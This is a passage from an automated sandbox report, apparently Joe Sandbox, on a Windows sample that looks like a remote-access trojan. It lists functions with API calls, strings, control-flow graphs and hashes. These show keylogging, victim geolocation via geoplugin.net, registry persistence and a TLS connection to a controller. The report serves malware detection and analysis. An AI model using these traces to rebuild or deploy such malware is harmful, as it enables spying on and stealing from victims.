                                        • Sleep.KERNEL32(00001388), ref: 00409E62
                                          • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                          • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                          • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                          • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                        • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                          • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                        • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                        • API String ID: 3795512280-3163867910
                                        • Opcode ID: 431120ea2e0ec05f5d77566325f4bfbe655a1002eb612d18d4f3077bf3784cb0
                                        • Instruction ID: 8be46055dc56f0d2ec4b071ca6400761e29966989419bbb2416efbd82a73718c
                                        • Opcode Fuzzy Hash: 431120ea2e0ec05f5d77566325f4bfbe655a1002eb612d18d4f3077bf3784cb0
                                        • Instruction Fuzzy Hash: 06517C616043005ACB05BB71D866ABF769AAFD1309F00053FF886B71E2DF3DA945869A
                                        Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1241 40428c-4042ad connect 1242 4043e1-4043e5 1241->1242 1243 4042b3-4042b6 1241->1243 1244 4043e7-4043f5 WSAGetLastError 1242->1244 1245 40445f 1242->1245 1246 4043da-4043dc 1243->1246 1247 4042bc-4042bf 1243->1247 1244->1245 1248 4043f7-4043fa 1244->1248 1249 404461-404465 1245->1249 1246->1249 1250 4042c1-4042e8 call 404cbf call 401f66 call 41a696 1247->1250 1251 4042eb-4042f5 call 420161 1247->1251 1253 404439-40443e 1248->1253 1254 4043fc-404437 call 41bc86 call 404c9e call 401f66 call 41a696 call 401eea 1248->1254 1250->1251 1262 404306-404313 call 420383 1251->1262 1263 4042f7-404301 1251->1263 1259 404443-40445c call 401f66 * 2 call 41a696 1253->1259 1254->1245 1259->1245 1276 404315-404338 call 401f66 * 2 call 41a696 1262->1276 1277 40434c-404357 call 420f44 1262->1277 1263->1259 1302 40433b-404347 call 4201a1 1276->1302 1288 404389-404396 call 4202fa 1277->1288 1289 404359-404387 call 401f66 * 2 call 41a696 call 4205a2 1277->1289 1299 404398-4043bb call 401f66 * 2 call 41a696 1288->1299 1300 4043be-4043d7 CreateEventW * 2 1288->1300 1289->1302 1299->1300 1300->1246 1302->1245
                                        APIs
                                        • connect.WS2_32(?,?,?), ref: 004042A5
                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                        • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                        • API String ID: 994465650-2151626615
                                        • Opcode ID: 3ddcc2c8b25d131ed1d8981cf26e6009bfc8be3c208b881942b02508a6528955
                                        • Instruction ID: feeaa4dc0a5480c3be004408dd81f6e2390fe6c9429734df96c13844dfc6b1ca
                                        • Opcode Fuzzy Hash: 3ddcc2c8b25d131ed1d8981cf26e6009bfc8be3c208b881942b02508a6528955
                                        • Instruction Fuzzy Hash: 3E4116B1B002026BCB04B77A8C4B66E7A55AB81354B40016FE901676D3FE79AD6087DF
                                        Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1316 40c89e-40c8c3 call 401e52 1319 40c8c9 1316->1319 1320 40c9ed-40ca13 call 401e07 GetLongPathNameW call 403b40 1316->1320 1321 40c8d0-40c8d5 1319->1321 1322 40c9c2-40c9c7 1319->1322 1323 40c905-40c90a 1319->1323 1324 40c9d8 1319->1324 1325 40c9c9-40c9ce call 43ac1f 1319->1325 1326 40c8da-40c8e8 call 41a75b call 401e18 1319->1326 1327 40c8fb-40c900 1319->1327 1328 40c9bb-40c9c0 1319->1328 1329 40c90f-40c916 call 41b16b 1319->1329 1344 40ca18-40ca85 call 403b40 call 40cc37 call 402860 * 2 call 401e13 * 5 1320->1344 1331 40c9dd-40c9e2 call 43ac1f 1321->1331 1322->1331 1323->1331 1324->1331 1336 40c9d3-40c9d6 1325->1336 1347 40c8ed 1326->1347 1327->1331 1328->1331 1345 40c918-40c968 call 403b40 call 43ac1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1329->1345 1346 40c96a-40c9b6 call 403b40 call 43ac1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1329->1346 1341 40c9e3-40c9e8 call 4082d7 1331->1341 1336->1324 1336->1341 1341->1320 1353 40c8f1-40c8f6 call 401e13 1345->1353 1346->1347 1347->1353 1353->1320
                                        APIs
                                        • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LongNamePath
                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                        • API String ID: 82841172-425784914
                                        • Opcode ID: 5638771ac5714ddadc0d5b1694dde0f121ac45befe08588207784c80853873f1
                                        • Instruction ID: a37aa742da7f535015bd00beacd4484d13b2c9c5bc690283ee024c69455bfc47
                                        • Opcode Fuzzy Hash: 5638771ac5714ddadc0d5b1694dde0f121ac45befe08588207784c80853873f1
                                        • Instruction Fuzzy Hash: 68413A721442009AC214F721DD97DAFB7A4AE90759F10063FB546720E2FE7CAA49C69F
                                        Function 0041A473 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 59COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                          • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
                                          • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                          • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                          • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                        • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4E9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CloseCurrentOpenQueryValueWow64
                                        • String ID: (32 bit)$ (64 bit)$0JG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                        • API String ID: 782494840-3211212173
                                        • Opcode ID: 26c60f6affbee6d217ba86e1928e9c23d3fea0a75ab30a776bd0b760c07e420e
                                        • Instruction ID: ceb3f8158c83cee62a9ab3acf094014ca2543c25b31c887bfc35cbf025930a6e
                                        • Opcode Fuzzy Hash: 26c60f6affbee6d217ba86e1928e9c23d3fea0a75ab30a776bd0b760c07e420e
                                        • Instruction Fuzzy Hash: F611CAA050020566C704B765DC9BDBF765ADB90304F40453FB506E31D2EB6C8E8583EE
                                        Function 0041A52B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1487 41a52b-41a56a call 401faa call 43a89c InternetOpenW InternetOpenUrlW 1492 41a56c-41a58d InternetReadFile 1487->1492 1493 41a5b3-41a5b6 1492->1493 1494 41a58f-41a5af call 401f86 call 402f08 call 401eea 1492->1494 1495 41a5b8-41a5ba 1493->1495 1496 41a5bc-41a5c9 InternetCloseHandle * 2 call 43a897 1493->1496 1494->1493 1495->1492 1495->1496 1500 41a5ce-41a5d8 1496->1500
                                        APIs
                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A54E
                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A564
                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A57D
                                        • InternetCloseHandle.WININET(00000000), ref: 0041A5C3
                                        • InternetCloseHandle.WININET(00000000), ref: 0041A5C6
                                        Strings
                                        • http://geoplugin.net/json.gp, xrefs: 0041A55E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleOpen$FileRead
                                        • String ID: http://geoplugin.net/json.gp
                                        • API String ID: 3121278467-91888290
                                        • Opcode ID: a574e59ae2a6d8659b3b708bfc28c48046a6cfc8e174729ee45d25f2e2c52857
                                        • Instruction ID: 987b679836a9d55d587b89d74e0435f254c545d991055b4d64d2ada4334a4818
                                        • Opcode Fuzzy Hash: a574e59ae2a6d8659b3b708bfc28c48046a6cfc8e174729ee45d25f2e2c52857
                                        • Instruction Fuzzy Hash: C111C4311093126BD224EA169C45DBF7FEDEF86365F00043EF905E2192DB689848C6BA
                                        Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1505 409d97-409da7 1506 409e44-409e47 1505->1506 1507 409dad-409daf 1505->1507 1508 409db2-409dd8 call 401e07 CreateFileW 1507->1508 1511 409e18 1508->1511 1512 409dda-409de8 GetFileSize 1508->1512 1515 409e1b-409e1f 1511->1515 1513 409dea 1512->1513 1514 409e0f-409e16 CloseHandle 1512->1514 1516 409df4-409dfb 1513->1516 1517 409dec-409df2 1513->1517 1514->1515 1515->1508 1518 409e21-409e24 1515->1518 1519 409e04-409e09 Sleep 1516->1519 1520 409dfd-409dff call 40a7f0 1516->1520 1517->1514 1517->1516 1518->1506 1521 409e26-409e2d 1518->1521 1519->1514 1520->1519 1521->1506 1523 409e2f-409e3f call 4082dc call 4098a5 1521->1523 1523->1506
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                        • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                        • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSizeSleep
                                        • String ID: `AG
                                        • API String ID: 1958988193-3058481221
                                        • Opcode ID: b0d5ab9d96485228d01e653f577d9a536d0e325b1c446dee4fcf46d6e6ae2c45
                                        • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                        • Opcode Fuzzy Hash: b0d5ab9d96485228d01e653f577d9a536d0e325b1c446dee4fcf46d6e6ae2c45
                                        • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                        Function 004126D2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1527 4126d2-4126e9 RegCreateKeyA 1528 412722 1527->1528 1529 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1527->1529 1531 412724-412730 call 401eea 1528->1531 1529->1531
                                        APIs
                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                        • RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                        • RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateValue
                                        • String ID: HgF$pth_unenc
                                        • API String ID: 1818849710-3662775637
                                        • Opcode ID: 1bd7bc63bfcb718f8a00b857ba0206b1347799401e36ec3cc1597cb67c32c774
                                        • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                        • Opcode Fuzzy Hash: 1bd7bc63bfcb718f8a00b857ba0206b1347799401e36ec3cc1597cb67c32c774
                                        • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                        Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                        • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                        • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
                                          • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                          • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateThread$LocalTimewsprintf
                                        • String ID: Offline Keylogger Started
                                        • API String ID: 465354869-4114347211
                                        • Opcode ID: 7dd086592dd2feb5cbf2408a3828b0047df0053d07ac6005fceb7baaed354c62
                                        • Instruction ID: 39d66220788a70d2f795ee3c864da876fba87127a7a6d83764b6ce8c19119ba3
                                        • Opcode Fuzzy Hash: 7dd086592dd2feb5cbf2408a3828b0047df0053d07ac6005fceb7baaed354c62
                                        • Instruction Fuzzy Hash: 8011A7B25003097ED220BA36DC87CBF765CDA813A8B40053EF845222D3EA785E54C6FB
                                        Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                        • RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                        • RegCloseKey.KERNEL32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateValue
                                        • String ID: TUF
                                        • API String ID: 1818849710-3431404234
                                        • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                        • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                        • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                        • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                        Function 0040AFBA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                        • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                        • TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: TerminateThread$HookUnhookWindows
                                        • String ID: pth_unenc
                                        • API String ID: 3123878439-4028850238
                                        • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                        • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                        • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                        • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                        Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                        • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                        • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 3360349984-0
                                        • Opcode ID: 72b013782cf94b1f3d34b8331976b904c6ebf93714f67b57431e08570f282644
                                        • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                        • Opcode Fuzzy Hash: 72b013782cf94b1f3d34b8331976b904c6ebf93714f67b57431e08570f282644
                                        • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                        Function 0041B59F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6B5,00000000,00000000,?), ref: 0041B5DE
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5FB
                                        • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B60F
                                        • CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B61C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandlePointerWrite
                                        • String ID:
                                        • API String ID: 3604237281-0
                                        • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                        • Instruction ID: 3b94612a358327762e597db0d4245ee78264fa841ead315e3e24d1cb8b3ec7b7
